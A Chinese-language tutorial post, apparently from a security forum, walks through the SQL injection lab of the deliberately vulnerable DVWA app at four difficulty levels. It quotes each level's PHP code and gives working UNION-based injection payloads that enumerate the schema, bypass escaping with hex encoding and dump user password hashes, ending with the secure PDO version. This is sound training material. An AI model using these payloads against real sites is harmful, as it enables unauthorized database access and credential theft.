首页
论坛
专栏
课程

分享:
### Low: 漏洞代码: ``` <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } mysqli_close($GLOBALS["___mysqli_ston"]); } ?> ``` 对前端传递进来的参数ID没有做任何过滤和检测,直接带入sql代码中进行查询。 1、判断注入是字符型还是数字型 输入 1,正常返回查询结果 ![](/upload/attach/201801/201801271558_EFSKZHZWVD2QAN6.jpg) 使用数字型语句测试, 1 or 1=1;# ![](/upload/attach/201801/201801271558_D79TSQ6DV3KF7QE.jpg) 使用字符型语句测试, 1' or 1=1;# ![](/upload/attach/201801/201801271558_ECAUDXUH6PNSCBU.jpg) 由此判断存在字符型注入 2、查询列数 当使用不存在的列数进行排序时会语法报错, 1' order by 1;# ![](/upload/attach/201801/201801271559_YDY2BM82A3VPDW9.jpg) 1' order by 2;# ![](/upload/attach/201801/201801271559_FMHZ4Y9FNSQYVWC.jpg) 1' order by 3;# ![](/upload/attach/201801/201801271559_95WRGY89SGP38Q3.jpg) 3、判断字段显示顺序 1' union select 1,2;# ![](/upload/attach/201801/201801271559_BHUJSEUKVSSBCXG.jpg) 4、查询当前用户与数据库名 1' union select database(),current_user();# ![](/upload/attach/201801/201801271559_3JEKHTJKDCRYCTE.jpg) 得到数据库名dvwa 5、查询数据库中的表 1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database();# ![](/upload/attach/201801/201801271600_VCVWR564J5WC29X.jpg) 得到guestbook,users表 6、查询users表中的字段名 1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users';# ![](/upload/attach/201801/201801271600_ZQ6SKKGGKAQPCJH.jpg) 7、爆破数据 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users; # ![](/upload/attach/201801/201801271600_VAW5JWUH94Q7GE9.jpg) ### Medium 漏洞代码: ``` <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Display values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } // This is used later on in the index.php page // Setting it here so we can close the database connection in here like in the rest of the source scripts $query = "SELECT COUNT(*) FROM users;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); $number_of_rows = mysqli_fetch_row( $result )[0]; mysqli_close($GLOBALS["___mysqli_ston"]); ?> ``` ```mysql_real_escape_string()```函数只对特殊符号x00,n,r,,’,”,x1a进行转义,然后在前端用下拉列表限制用户输入,使用burp suite抓包修改即可绕过限制。 1、判断注入是字符型还是数字型 使用字符型语句测试, 1' or 1=1;# ![](/upload/attach/201801/201801271600_2A4CJ53G3QTU8SJ.jpg) ![](/upload/attach/201801/201801271601_ENMD3BW7MW5RTNB.jpg) 使用数字型语句测试, 1 or 1=1;# ![](/upload/attach/201801/201801271601_8ZSC2DPSRYJQNAB.jpg) ![](/upload/attach/201801/201801271601_X4GBCMUMU5HJGAX.jpg) 由此判断存在数字型注入 2、查询列数 当使用不存在的列数进行排序时会语法报错, 1 order by 2;# ![](/upload/attach/201801/201801271601_RTQ3UVFGG4DEMCT.jpg) 1 order by 3;# ![](/upload/attach/201801/201801271601_G9QYF2ASPNXACCH.jpg) order by 2时正常返回,等于3则语法报错,说明存在2列。 3、判断字段显示顺序 1 union select 1,2;# ![](/upload/attach/201801/201801271602_JE9A323KUTDCCGJ.jpg) 4、查询当前用户与数据库名 1 union select database(),current_user();# ![](/upload/attach/201801/201801271602_V8FRBDWJU78MTYQ.jpg) 得到数据库名dvwa 5、查询数据库中的表 1 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database();# ![](/upload/attach/201801/201801271602_4RPJ5D46NZQ3M7C.jpg) 得到guestbook,users表 6、查询users表中的字段名 1 union select 1, group_concat(column_name) from information_schema.columns where table_name='users';# ![](/upload/attach/201801/201801271602_UC4UXVZ88KY5V7Y.jpg) 由于```mysql_real_escape_string()```函数对单引号 ' 进行了转义,可以用16进制编码绕过此处限制。 1 union select 1, group_concat(column_name) from information_schema.columns where table_name=0x7573657273;# ![](/upload/attach/201801/201801271602_M5NY8HNTFAQXKND.jpg) 7、爆破数据 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users; # ![](/upload/attach/201801/201801271603_EWND4ZWQE8KABD6.jpg) ### High 漏洞代码: ``` <?php if( isset( $_SESSION [ 'id' ] ) ) { // Get input $id = $_SESSION[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?> ``` 查询语句获取ID时,增加了单引号,所以这是个字符型注入,limit 1限制了只能查询一个结果,这个用注释#就可以绕过。 high级别与中低级别是一样的,所以这里只演示最后的爆破数据结果: 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users; # ![](/upload/attach/201801/201801271603_JAND3YY73PM7UDC.jpg) ![](/upload/attach/201801/201801271603_QVT47Y2QQX5EKMH.jpg) ### Impossible 漏洞代码: ``` <?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $id = $_GET[ 'id' ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindParam( ':id', $id, PDO::PARAM_INT ); $data->execute(); $row = $data->fetch(); // Make sure only 1 result is returned if( $data->rowCount() == 1 ) { // Get values $first = $row[ 'first_name' ]; $last = $row[ 'last_name' ]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } } // Generate Anti-CSRF token generateSessionToken(); ?> ``` Impossible级别的程序使用了pdo实现数据代码分离,而且针对查询结果进行限制,只有1条时才会输出,提高了一定的安全性。 参照: [新手指南:DVWA-1.9全级别教程之SQL Injection](http://www.freebuf.com/articles/web/120747.html) 注:dvwa的漏洞网上已经有一堆人在写了,但是针对的都是旧版本,有些细节会有变化,本文使用最新版 DVWA v1.10重写。

上一篇 :
下一篇 :
讨论 (1)
欢声GG 2018-6-4
 举报
最后的impossible  能进行注入吗?是存在的吧?
沪ICP备16048531号-1
沪公网安备 31011502006611号